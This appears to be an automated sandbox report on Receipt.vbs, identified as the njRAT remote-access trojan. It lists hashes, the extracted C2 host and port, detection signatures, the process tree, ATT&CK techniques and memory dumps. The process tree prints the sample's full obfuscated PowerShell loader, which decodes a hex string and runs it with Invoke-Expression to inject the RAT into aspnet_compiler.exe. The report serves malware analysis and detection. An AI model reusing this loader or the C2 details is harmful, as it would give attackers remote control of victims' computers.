Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    18-10-2021 19:43

General

  • Target

    Receipt.vbs

  • Size

    2KB

  • MD5

    5148319e32fa247453f35aa2ea0af0a2

  • SHA1

    69afc36ee0cf368fb248af04df99c8aa8faba731

  • SHA256

    11850e5727c8a31ca7192fc9546050442376f7b77359f7d4e971f1f823105504

  • SHA512

    313fe826b3e7497313dfd15684dd6c1e459368c294db5a9fc1b9a6b6e99af441a567cf6ba649b4a973bb67bfc6ee80dd7bc0c11d70fe58981c258b63ed63f760

Malware Config

Extracted

Family

njrat

Version

v4.0

Botnet

RackSPACE

C2

petrol-chem108.duckdns.org:40225

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Receipt.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HB='!` ~+ ~A ~$ `` `+ `^ ~^ `& `! `$ `E `A ~+ `` `^ `& `$ !0 +D !0 !& ^$ &` &` &0 +A !F !F +! +0 !E +1 += +^ !E +! +0 +0 !E +& +^ !F +1 +1 +0 +! +0 += !D ^! &= &0 ^1 &+ &+ !E &` &$ &` !& +B 0D 0A !` `~ `` ~! `^ `& `$ `E `A `D `B `` `~ `^ `& `$ `A !0 +D !0 !& ^E `~ !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D `~ ^! `+ !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B ~` !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !& !C !& &` !E ~& !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !& !C !& ^C `= `~ `E !& != +B 0D 0A !` ~+ ~$ `` `+ `^ ~^ `& `! `$ `E `A ~$ `` `+ `^ ~^ `& `! `$ `A `B !0 +D !0 !& `` `F !A !A !A !A !A !A !A !A !A !A !A !A !A ^1 `` ~+ ~` +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E `& !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !A !A !A !A !A !A !A !A !A !A !A !A !A !& !C !& ~& ^E `C ^F !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E !& !C !& &! `= ^E !& != +B 0D 0A !` ~+ ~& ~$ `` `~ `+ ~! `^ `& ~= `$ ~~ `A `= ~+ `` `^ ~^ `& `$ `A !0 +D !& `= ^0 `~ ~$ !$ ^E ^0 !D !D !D !D !D !D !D !D !D !D !D !D !D ^0 ^+ ^0 ~` !0 !` `~ `` ~! `^ `& `$ `E `A `D `B `` +C +C +C +C +C +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E +E +E +E `& `! `$ `E `A ~+ `` `^ `& `$ != !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !D !D !D !D !D !D !D !D !D !D !D !D !D !& !C !& ^~ ^0 ~& ^0 !D `F ^! ^A ^0 `~ !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& +C +C +C +C +C +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E +E +E +E !& !C !& `~ `^ `& `$ `A != !E !` ~+ ~$ `` `+ `^ ~^ `& `! `$ `E `A ~$ `` `+ `^ ~^ `& `! `$ `A `B !$ !` ~+ ~A ~$ `` `+ `^ ~^ !& != +B 0D 0A !^ !$ !& `= !& !B !& `~ ~$ !& != !$ !` ~+ ~& ~$ `` `~ `+ ~! `^ `& ~= `$ ~~ `A `= ~+ `` `^ ~^ `& `$ `A !0 !D `A ^F ^= ^E !0 !& !& != &C !^ !$ !& `= !& !B !& `~ ~$ !& != +B'.Replace('!','2').Replace('`','4').Replace('^','6').Replace('+','3').Replace('~','5').Replace('&','7').Replace('$','8').Replace('=','9');Invoke-Expression (-join ($HB -split ' ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4036
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
          PID:756
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          PID:3884

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3884-159-0x0000000000400000-0x000000000040E000-memory.dmp
      Filesize

      56KB

    • memory/3884-169-0x0000000005DB0000-0x0000000005DB1000-memory.dmp
      Filesize

      4KB

    • memory/3884-168-0x0000000005B70000-0x0000000005B71000-memory.dmp
      Filesize

      4KB

    • memory/3884-167-0x0000000005BE0000-0x0000000005BE1000-memory.dmp
      Filesize

      4KB

    • memory/3884-166-0x0000000005BD0000-0x0000000005BD1000-memory.dmp
      Filesize

      4KB

    • memory/3884-165-0x00000000060E0000-0x00000000060E1000-memory.dmp
      Filesize

      4KB

    • memory/3884-164-0x0000000005550000-0x0000000005551000-memory.dmp
      Filesize

      4KB

    • memory/3884-160-0x000000000040838E-mapping.dmp
    • memory/4036-122-0x00000272C15E3000-0x00000272C15E5000-memory.dmp
      Filesize

      8KB

    • memory/4036-156-0x00000272C3870000-0x00000272C3873000-memory.dmp
      Filesize

      12KB

    • memory/4036-125-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-126-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-127-0x00000272C38C0000-0x00000272C38C1000-memory.dmp
      Filesize

      4KB

    • memory/4036-128-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-132-0x00000272C15E6000-0x00000272C15E8000-memory.dmp
      Filesize

      8KB

    • memory/4036-143-0x00000272C15E8000-0x00000272C15E9000-memory.dmp
      Filesize

      4KB

    • memory/4036-148-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-149-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-155-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-124-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-157-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-123-0x00000272C3710000-0x00000272C3711000-memory.dmp
      Filesize

      4KB

    • memory/4036-115-0x0000000000000000-mapping.dmp
    • memory/4036-161-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-121-0x00000272C15E0000-0x00000272C15E2000-memory.dmp
      Filesize

      8KB

    • memory/4036-120-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-119-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-118-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-117-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB

    • memory/4036-116-0x00000272A79D0000-0x00000272A79D2000-memory.dmp
      Filesize

      8KB